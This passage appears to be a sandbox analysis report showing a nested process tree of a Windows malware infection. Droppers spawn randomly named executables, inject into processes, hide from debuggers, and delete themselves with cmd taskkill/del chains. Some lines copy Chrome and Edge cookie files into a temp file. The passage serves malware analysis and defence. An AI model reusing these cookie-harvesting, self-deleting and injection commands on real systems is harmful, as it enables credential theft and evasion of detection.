            • C:\Users\Admin\Documents\audl0_VeNZBC_ovWY7CKOj6Y.exe
              "C:\Users\Admin\Documents\audl0_VeNZBC_ovWY7CKOj6Y.exe"
              11⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              PID:1344
              • C:\Users\Admin\Documents\audl0_VeNZBC_ovWY7CKOj6Y.exe
                C:\Users\Admin\Documents\audl0_VeNZBC_ovWY7CKOj6Y.exe
                12⤵
                PID:6996
            • C:\Users\Admin\Documents\hD0d1To11xPyJ0KyoiD3WUDb.exe
              "C:\Users\Admin\Documents\hD0d1To11xPyJ0KyoiD3WUDb.exe"
              11⤵
              PID:5960
              • C:\Users\Admin\AppData\Roaming\8015531.exe
                "C:\Users\Admin\AppData\Roaming\8015531.exe"
                12⤵
                PID:7484
              • C:\Users\Admin\AppData\Roaming\8547604.exe
                "C:\Users\Admin\AppData\Roaming\8547604.exe"
                12⤵
                PID:7640
            • C:\Users\Admin\Documents\F3gr0jezIql8eB7IiTDNzFdx.exe
              "C:\Users\Admin\Documents\F3gr0jezIql8eB7IiTDNzFdx.exe"
              11⤵
              • Suspicious use of SetThreadContext
              • Drops file in Windows directory
              PID:748
              • C:\Users\Admin\Documents\F3gr0jezIql8eB7IiTDNzFdx.exe
                C:\Users\Admin\Documents\F3gr0jezIql8eB7IiTDNzFdx.exe
                12⤵
                PID:7636
            • C:\Users\Admin\Documents\KtnWW_2yLIikFfc94LR7Stvi.exe
              "C:\Users\Admin\Documents\KtnWW_2yLIikFfc94LR7Stvi.exe"
              11⤵
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              PID:6180
            • C:\Users\Admin\Documents\wypQmFM9_xM_gY7ocyEMdeSh.exe
              "C:\Users\Admin\Documents\wypQmFM9_xM_gY7ocyEMdeSh.exe"
              11⤵
              PID:6172
              • C:\Users\Admin\Documents\wypQmFM9_xM_gY7ocyEMdeSh.exe
                "C:\Users\Admin\Documents\wypQmFM9_xM_gY7ocyEMdeSh.exe"
                12⤵
                • Modifies data under HKEY_USERS
                PID:9516
            • C:\Users\Admin\Documents\nGOFdHTLSYTaVm6rKZclVRVd.exe
              "C:\Users\Admin\Documents\nGOFdHTLSYTaVm6rKZclVRVd.exe"
              11⤵
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              PID:6164
              • C:\Users\Admin\AppData\Roaming\1234.exe
                C:\Users\Admin\AppData\Roaming\1234.exe 1234
                12⤵
                • Suspicious use of SetThreadContext
                PID:9204
                • C:\Users\Admin\AppData\Roaming\1234.exe
                  "{path}"
                  13⤵
                  PID:9744
                • C:\Users\Admin\AppData\Roaming\1234.exe
                  "{path}"
                  13⤵
                  PID:9776
                • C:\Users\Admin\AppData\Roaming\1234.exe
                  "{path}"
                  13⤵
                  PID:9792
            • C:\Users\Admin\Documents\L33vnYX4vQCQmkbMfZ4Ha1vl.exe
              "C:\Users\Admin\Documents\L33vnYX4vQCQmkbMfZ4Ha1vl.exe"
              11⤵
              PID:6156
              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                12⤵
                PID:7252
              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                12⤵
                PID:5892
              • C:\Users\Admin\AppData\Local\Temp\22222.exe
                C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                12⤵
                PID:7904
              • C:\Users\Admin\AppData\Local\Temp\22222.exe
                C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                12⤵
                PID:6816
                • C:\Users\Admin\AppData\Local\Temp\7zSC78071F6\karotima_1.exe
                  karotima_1.exe
                  13⤵
                  • Checks computer location settings
                  PID:8216
                  • C:\Users\Admin\Documents\VISe3LmTDViO2hY_06q5N8NH.exe
                    "C:\Users\Admin\Documents\VISe3LmTDViO2hY_06q5N8NH.exe"
                    14⤵
                    • Checks BIOS information in registry
                    • Checks whether UAC is enabled
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                PID:7116
                                                                                                                              • C:\Users\Admin\Documents\c7oo7segTNDDyD72HcU7dxDT.exe
                                                                                                                                "C:\Users\Admin\Documents\c7oo7segTNDDyD72HcU7dxDT.exe"
                                                                                                                                14⤵
                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                PID:5032
                                                                                                                                • C:\Users\Admin\Documents\c7oo7segTNDDyD72HcU7dxDT.exe
                                                                                                                                  C:\Users\Admin\Documents\c7oo7segTNDDyD72HcU7dxDT.exe
                                                                                                                                  15⤵
                                                                                                                                    PID:2188
                                                                                                                                  • C:\Users\Admin\Documents\c7oo7segTNDDyD72HcU7dxDT.exe
                                                                                                                                    C:\Users\Admin\Documents\c7oo7segTNDDyD72HcU7dxDT.exe
                                                                                                                                    15⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                    PID:4720
                                                                                                                                • C:\Users\Admin\Documents\J8ufMsp1sVMN_kCN_H08Vf1b.exe
                                                                                                                                  "C:\Users\Admin\Documents\J8ufMsp1sVMN_kCN_H08Vf1b.exe"
                                                                                                                                  14⤵
                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                  PID:9044
                                                                                                                                  • C:\Users\Admin\Documents\J8ufMsp1sVMN_kCN_H08Vf1b.exe
                                                                                                                                    C:\Users\Admin\Documents\J8ufMsp1sVMN_kCN_H08Vf1b.exe
                                                                                                                                    15⤵
                                                                                                                                      PID:9392
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        "C:\Windows\System32\cmd.exe" /c taskkill /im J8ufMsp1sVMN_kCN_H08Vf1b.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\J8ufMsp1sVMN_kCN_H08Vf1b.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                        16⤵
                                                                                                                                          PID:7364
                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                            taskkill /im J8ufMsp1sVMN_kCN_H08Vf1b.exe /f
                                                                                                                                            17⤵
                                                                                                                                            • Kills process with taskkill
                                                                                                                                            PID:10116
                                                                                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                            timeout /t 6
                                                                                                                                            17⤵
                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                            PID:10908
                                                                                                                                    • C:\Users\Admin\Documents\f9ydE1JcEI9WRfOfeGSMcjBH.exe
                                                                                                                                      "C:\Users\Admin\Documents\f9ydE1JcEI9WRfOfeGSMcjBH.exe"
                                                                                                                                      14⤵
                                                                                                                                        PID:3736
                                                                                                                                        • C:\Users\Admin\Documents\f9ydE1JcEI9WRfOfeGSMcjBH.exe
                                                                                                                                          C:\Users\Admin\Documents\f9ydE1JcEI9WRfOfeGSMcjBH.exe
                                                                                                                                          15⤵
                                                                                                                                            PID:9652
                                                                                                                                        • C:\Users\Admin\Documents\0GIlXd9yZp6wsTvuFRvpz6mx.exe
                                                                                                                                          "C:\Users\Admin\Documents\0GIlXd9yZp6wsTvuFRvpz6mx.exe"
                                                                                                                                          14⤵
                                                                                                                                            PID:8580
                                                                                                                                            • C:\Users\Admin\Documents\0GIlXd9yZp6wsTvuFRvpz6mx.exe
                                                                                                                                              C:\Users\Admin\Documents\0GIlXd9yZp6wsTvuFRvpz6mx.exe
                                                                                                                                              15⤵
                                                                                                                                                PID:7856
                                                                                                                                            • C:\Users\Admin\Documents\vnWibiH1W0aJuRL0cDMFsXkK.exe
                                                                                                                                              "C:\Users\Admin\Documents\vnWibiH1W0aJuRL0cDMFsXkK.exe"
                                                                                                                                              14⤵
                                                                                                                                              • Loads dropped DLL
                                                                                                                                              • Checks processor information in registry
                                                                                                                                              PID:7124
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im vnWibiH1W0aJuRL0cDMFsXkK.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\vnWibiH1W0aJuRL0cDMFsXkK.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                15⤵
                                                                                                                                                  PID:8692
                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                    taskkill /im vnWibiH1W0aJuRL0cDMFsXkK.exe /f
                                                                                                                                                    16⤵
                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                    PID:9764
                                                                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                    timeout /t 6
                                                                                                                                                    16⤵
                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                    PID:8932
                                                                                                                                              • C:\Users\Admin\Documents\knZxoi8AeMtAdd1I6KdVrft_.exe
                                                                                                                                                "C:\Users\Admin\Documents\knZxoi8AeMtAdd1I6KdVrft_.exe"
                                                                                                                                                14⤵
                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                PID:8652
                                                                                                                                                • C:\Users\Admin\Documents\knZxoi8AeMtAdd1I6KdVrft_.exe
                                                                                                                                                  "C:\Users\Admin\Documents\knZxoi8AeMtAdd1I6KdVrft_.exe"
                                                                                                                                                  15⤵
                                                                                                                                                  • Checks processor information in registry
                                                                                                                                                  PID:8884
                                                                                                                                              • C:\Users\Admin\Documents\9N5W0iYxJCTehyftDpthiczR.exe
                                                                                                                                                "C:\Users\Admin\Documents\9N5W0iYxJCTehyftDpthiczR.exe"
                                                                                                                                                14⤵
                                                                                                                                                  PID:5884
                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\3023574.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\3023574.exe"
                                                                                                                                                    15⤵
                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                    PID:7944
                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\6539450.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\6539450.exe"
                                                                                                                                                    15⤵
                                                                                                                                                      PID:8380
                                                                                                                                                  • C:\Users\Admin\Documents\yoqOow7h46aMSvyXCu5h1nDt.exe
                                                                                                                                                    "C:\Users\Admin\Documents\yoqOow7h46aMSvyXCu5h1nDt.exe"
                                                                                                                                                    14⤵
                                                                                                                                                    • Drops file in Program Files directory
                                                                                                                                                    PID:8420
                                                                                                                                                  • C:\Users\Admin\Documents\Y3AhzptKS3yrFEeNFHEgKXxq.exe
                                                                                                                                                    "C:\Users\Admin\Documents\Y3AhzptKS3yrFEeNFHEgKXxq.exe"
                                                                                                                                                    14⤵
                                                                                                                                                      PID:7712
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                        15⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        PID:5960
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                        15⤵
                                                                                                                                                          PID:3476
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                          15⤵
                                                                                                                                                            PID:9848
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                            15⤵
                                                                                                                                                              PID:6968
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                              15⤵
                                                                                                                                                                PID:6188
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                15⤵
                                                                                                                                                                  PID:10656
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                  15⤵
                                                                                                                                                                    PID:5872
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                    15⤵
                                                                                                                                                                      PID:7700
                                                                                                                                                                  • C:\Users\Admin\Documents\tltxokbc1yN35eilGiuHfwDx.exe
                                                                                                                                                                    "C:\Users\Admin\Documents\tltxokbc1yN35eilGiuHfwDx.exe"
                                                                                                                                                                    14⤵
                                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                                    PID:8896
                                                                                                                                                                  • C:\Users\Admin\Documents\DVqb_TDIAzkvLTgUw1yqu20V.exe
                                                                                                                                                                    "C:\Users\Admin\Documents\DVqb_TDIAzkvLTgUw1yqu20V.exe"
                                                                                                                                                                    14⤵
                                                                                                                                                                      PID:3568
                                                                                                                                                                    • C:\Users\Admin\Documents\zonKxae4HwvmLf24aKm5lVWw.exe
                                                                                                                                                                      "C:\Users\Admin\Documents\zonKxae4HwvmLf24aKm5lVWw.exe"
                                                                                                                                                                      14⤵
• Suspicious use of SetThreadContext
PID:9112
• C:\Users\Admin\Documents\zonKxae4HwvmLf24aKm5lVWw.exe
  C:\Users\Admin\Documents\zonKxae4HwvmLf24aKm5lVWw.exe
  15⤵
    PID:7832
• C:\Users\Admin\Documents\Ol9TqYZFRp6j2ilrLokMFSL9.exe
  "C:\Users\Admin\Documents\Ol9TqYZFRp6j2ilrLokMFSL9.exe"
  14⤵
    PID:8960
    • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
      "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
      15⤵
        PID:7760
        • C:\Users\Admin\AppData\Local\Temp\7zS05EBB857\setup_install.exe
          "C:\Users\Admin\AppData\Local\Temp\7zS05EBB857\setup_install.exe"
          16⤵
            PID:9116
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c karotima_2.exe
              17⤵
                PID:9124
                • C:\Users\Admin\AppData\Local\Temp\7zS05EBB857\karotima_2.exe
                  karotima_2.exe
                  18⤵
                    PID:8100
                    • C:\Users\Admin\AppData\Local\Temp\7zS05EBB857\karotima_2.exe
                      "C:\Users\Admin\AppData\Local\Temp\7zS05EBB857\karotima_2.exe" -a
                      19⤵
                        PID:7956
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c karotima_1.exe
                    17⤵
                      PID:5868
                      • C:\Users\Admin\AppData\Local\Temp\7zS05EBB857\karotima_1.exe
                        karotima_1.exe
                        18⤵
                        • Checks computer location settings
                        PID:8224
                        • C:\Users\Admin\Documents\MVubXEv0WqAPiWWR9vpUFUs9.exe
                          "C:\Users\Admin\Documents\MVubXEv0WqAPiWWR9vpUFUs9.exe"
                          19⤵
                          • Checks BIOS information in registry
                          • Checks whether UAC is enabled
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          • Suspicious use of SetThreadContext
                          PID:6404
                          • C:\Users\Admin\Documents\MVubXEv0WqAPiWWR9vpUFUs9.exe
                            C:\Users\Admin\Documents\MVubXEv0WqAPiWWR9vpUFUs9.exe
                            20⤵
                              PID:8440
                          • C:\Users\Admin\Documents\A_g1YcwWUfOvrE0An2ZxzgUc.exe
                            "C:\Users\Admin\Documents\A_g1YcwWUfOvrE0An2ZxzgUc.exe"
                            19⤵
                            • Suspicious use of SetThreadContext
                            PID:9304
                            • C:\Users\Admin\Documents\A_g1YcwWUfOvrE0An2ZxzgUc.exe
                              C:\Users\Admin\Documents\A_g1YcwWUfOvrE0An2ZxzgUc.exe
                              20⤵
                                PID:8208
                              • C:\Users\Admin\Documents\A_g1YcwWUfOvrE0An2ZxzgUc.exe
                                C:\Users\Admin\Documents\A_g1YcwWUfOvrE0An2ZxzgUc.exe
                                20⤵
                                • Suspicious use of SetThreadContext
                                PID:3736
                              • C:\Users\Admin\Documents\A_g1YcwWUfOvrE0An2ZxzgUc.exe
                                C:\Users\Admin\Documents\A_g1YcwWUfOvrE0An2ZxzgUc.exe
                                20⤵
                                  PID:3196
                              • C:\Users\Admin\Documents\QQKX26DbAQgMccBCro2YClFw.exe
                                "C:\Users\Admin\Documents\QQKX26DbAQgMccBCro2YClFw.exe"
                                19⤵
                                • Suspicious use of SetThreadContext
                                PID:6964
                                • C:\Users\Admin\Documents\QQKX26DbAQgMccBCro2YClFw.exe
                                  C:\Users\Admin\Documents\QQKX26DbAQgMccBCro2YClFw.exe
                                  20⤵
                                    PID:7940
                                • C:\Users\Admin\Documents\aGv7glKs8ItP7FtQtEXmd6W5.exe
                                  "C:\Users\Admin\Documents\aGv7glKs8ItP7FtQtEXmd6W5.exe"
                                  19⤵
                                    PID:10124
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /c cmd < Sorrisi.tmp
                                      20⤵
                                        PID:6528
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd
                                          21⤵
                                            PID:8160
                                            • C:\Windows\SysWOW64\findstr.exe
                                              findstr /V /R "^yNFefWPitqXbQXexaaaweTJMeyyzoIKOZcrabptodYbHejNKUaJtRjoktSZpRcZcdpbxUJWpgpLtcwKPaxnPYFWNhRgFpV$" Sapete.tmp
                                              22⤵
                                                PID:6620
                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.004\Acre.exe.com
                                                Acre.exe.com k
                                                22⤵
                                                • Suspicious use of SetThreadContext
                                                • Suspicious behavior: MapViewOfSection
                                                PID:10320
                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.004\RegAsm.exe
                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.004\RegAsm.exe
                                                  23⤵
                                                    PID:5184
                                                • C:\Windows\SysWOW64\PING.EXE
                                                  ping 127.0.0.1 -n 30
                                                  22⤵
                                                  • Runs ping.exe
                                                  PID:6760
                                        • C:\Users\Admin\Documents\DJGLJFPl6kE0E1qsxhrDh3RH.exe
                                          "C:\Users\Admin\Documents\DJGLJFPl6kE0E1qsxhrDh3RH.exe"
                                          19⤵
                                          • Checks BIOS information in registry
                                          • Checks whether UAC is enabled
                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                          PID:5296
                                          • C:\Users\Admin\AppData\Roaming\1234.exe
                                            C:\Users\Admin\AppData\Roaming\1234.exe 1234
                                            20⤵
                                            • Suspicious use of SetThreadContext
                                            PID:8568
                                            • C:\Users\Admin\AppData\Roaming\1234.exe
                                              "{path}"
                                              21⤵
                                                PID:4172
                                          • C:\Users\Admin\Documents\sFDvu_WR0h2PTCy30r6CHskb.exe
                                            "C:\Users\Admin\Documents\sFDvu_WR0h2PTCy30r6CHskb.exe"
                                            19⤵
                                              PID:1868
                                              • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                                "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                                                20⤵
                                                  PID:9880
                                                  • C:\Users\Admin\AppData\Local\Temp\7zS8960A3D7\setup_install.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\7zS8960A3D7\setup_install.exe"
                                                    21⤵
                                                    • Loads dropped DLL
                                                    PID:6656
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c karotima_2.exe
                                                      22⤵
                                                        PID:404
                                                        • C:\Users\Admin\AppData\Local\Temp\7zS8960A3D7\karotima_2.exe
                                                          karotima_2.exe
                                                          23⤵
                                                            PID:9176
                                                            • C:\Users\Admin\AppData\Local\Temp\7zS8960A3D7\karotima_2.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\7zS8960A3D7\karotima_2.exe" -a
                                                              24⤵
                                                                PID:7020
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c karotima_1.exe
                                                            22⤵
                                                              PID:5552
                                                              • C:\Users\Admin\AppData\Local\Temp\7zS8960A3D7\karotima_1.exe
                                                                karotima_1.exe
                                                                23⤵
                                                                • Checks computer location settings
                                                                                                                                                                                                                                        PID:8272
                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\YCTrZvq4N7P_Z9DPRKmuxbdp.exe
                                                                                                                                                                                                                                          "C:\Users\Admin\Documents\YCTrZvq4N7P_Z9DPRKmuxbdp.exe"
                                                                                                                                                                                                                                          24⤵
                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                          PID:4340
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c cmd < Sorrisi.tmp
                                                                                                                                                                                                                                            25⤵
                                                                                                                                                                                                                                              PID:11172
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                cmd
                                                                                                                                                                                                                                                26⤵
                                                                                                                                                                                                                                                  PID:10036
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                    findstr /V /R "^yNFefWPitqXbQXexaaaweTJMeyyzoIKOZcrabptodYbHejNKUaJtRjoktSZpRcZcdpbxUJWpgpLtcwKPaxnPYFWNhRgFpV$" Sapete.tmp
                                                                                                                                                                                                                                                    27⤵
                                                                                                                                                                                                                                                      PID:4256
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.005\Acre.exe.com
                                                                                                                                                                                                                                                      Acre.exe.com k
                                                                                                                                                                                                                                                      27⤵
                                                                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                      PID:10504
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.005\RegAsm.exe
                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.005\RegAsm.exe
                                                                                                                                                                                                                                                        28⤵
                                                                                                                                                                                                                                                          PID:5764
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                        ping 127.0.0.1 -n 30
                                                                                                                                                                                                                                                        27⤵
                                                                                                                                                                                                                                                        • Runs ping.exe
                                                                                                                                                                                                                                                        PID:10612
                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\nT753VUnP8uCrnjIkmcQFiTv.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\Documents\nT753VUnP8uCrnjIkmcQFiTv.exe"
                                                                                                                                                                                                                                                  24⤵
                                                                                                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                                                                                                  PID:5332
                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\okcf6_kbZYKfkBmtk9_4Dg5R.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\Documents\okcf6_kbZYKfkBmtk9_4Dg5R.exe"
                                                                                                                                                                                                                                                  24⤵
                                                                                                                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                  PID:2504
                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\K9AmIoUqZd_MmtbT5cEp9i4s.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\Documents\K9AmIoUqZd_MmtbT5cEp9i4s.exe"
                                                                                                                                                                                                                                                  24⤵
                                                                                                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                  PID:10136
                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\K9AmIoUqZd_MmtbT5cEp9i4s.exe
                                                                                                                                                                                                                                                    C:\Users\Admin\Documents\K9AmIoUqZd_MmtbT5cEp9i4s.exe
                                                                                                                                                                                                                                                    25⤵
                                                                                                                                                                                                                                                      PID:7888
                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\xYQyIrMDmMF49DKsllEbovkc.exe
                                                                                                                                                                                                                                                    "C:\Users\Admin\Documents\xYQyIrMDmMF49DKsllEbovkc.exe"
                                                                                                                                                                                                                                                    24⤵
                                                                                                                                                                                                                                                    • Drops file in Program Files directory
                                                                                                                                                                                                                                                    PID:4992
                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\7xaAXt_dkjsczFKhVZaAReDY.exe
                                                                                                                                                                                                                                                    "C:\Users\Admin\Documents\7xaAXt_dkjsczFKhVZaAReDY.exe"
                                                                                                                                                                                                                                                    24⤵
                                                                                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                    PID:5352
                                                                                                                                                                                                                                                    • C:\Users\Admin\Documents\7xaAXt_dkjsczFKhVZaAReDY.exe
                                                                                                                                                                                                                                                      C:\Users\Admin\Documents\7xaAXt_dkjsczFKhVZaAReDY.exe
                                                                                                                                                                                                                                                      25⤵
                                                                                                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                                                                                                      PID:9776
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c taskkill /im 7xaAXt_dkjsczFKhVZaAReDY.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\7xaAXt_dkjsczFKhVZaAReDY.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                                                        26⤵
                                                                                                                                                                                                                                                          PID:8992
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                            taskkill /im 7xaAXt_dkjsczFKhVZaAReDY.exe /f
                                                                                                                                                                                                                                                            27⤵
                                                                                                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                                                                                                            PID:9472
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                            timeout /t 6
                                                                                                                                                                                                                                                            27⤵
                                                                                                                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                                                                                                                            PID:3940
                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\7xaAXt_dkjsczFKhVZaAReDY.exe
                                                                                                                                                                                                                                                        C:\Users\Admin\Documents\7xaAXt_dkjsczFKhVZaAReDY.exe
                                                                                                                                                                                                                                                        25⤵
                                                                                                                                                                                                                                                          PID:9700
                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\mxsw_SF3dUvPALDk3a70KUTD.exe
                                                                                                                                                                                                                                                        "C:\Users\Admin\Documents\mxsw_SF3dUvPALDk3a70KUTD.exe"
                                                                                                                                                                                                                                                        24⤵
                                                                                                                                                                                                                                                          PID:10160
                                                                                                                                                                                                                                                          • C:\Users\Admin\Documents\mxsw_SF3dUvPALDk3a70KUTD.exe
                                                                                                                                                                                                                                                            "C:\Users\Admin\Documents\mxsw_SF3dUvPALDk3a70KUTD.exe"
                                                                                                                                                                                                                                                            25⤵
                                                                                                                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                            PID:8476
                                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\JDhJ1NC9rfeSlaTwcn1uUMIX.exe
                                                                                                                                                                                                                                                          "C:\Users\Admin\Documents\JDhJ1NC9rfeSlaTwcn1uUMIX.exe"
                                                                                                                                                                                                                                                          24⤵
                                                                                                                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                          PID:2832
    • C:\Users\Admin\Documents\JDhJ1NC9rfeSlaTwcn1uUMIX.exe
      C:\Users\Admin\Documents\JDhJ1NC9rfeSlaTwcn1uUMIX.exe
      25⤵
      PID:10716
    • C:\Users\Admin\Documents\JDhJ1NC9rfeSlaTwcn1uUMIX.exe
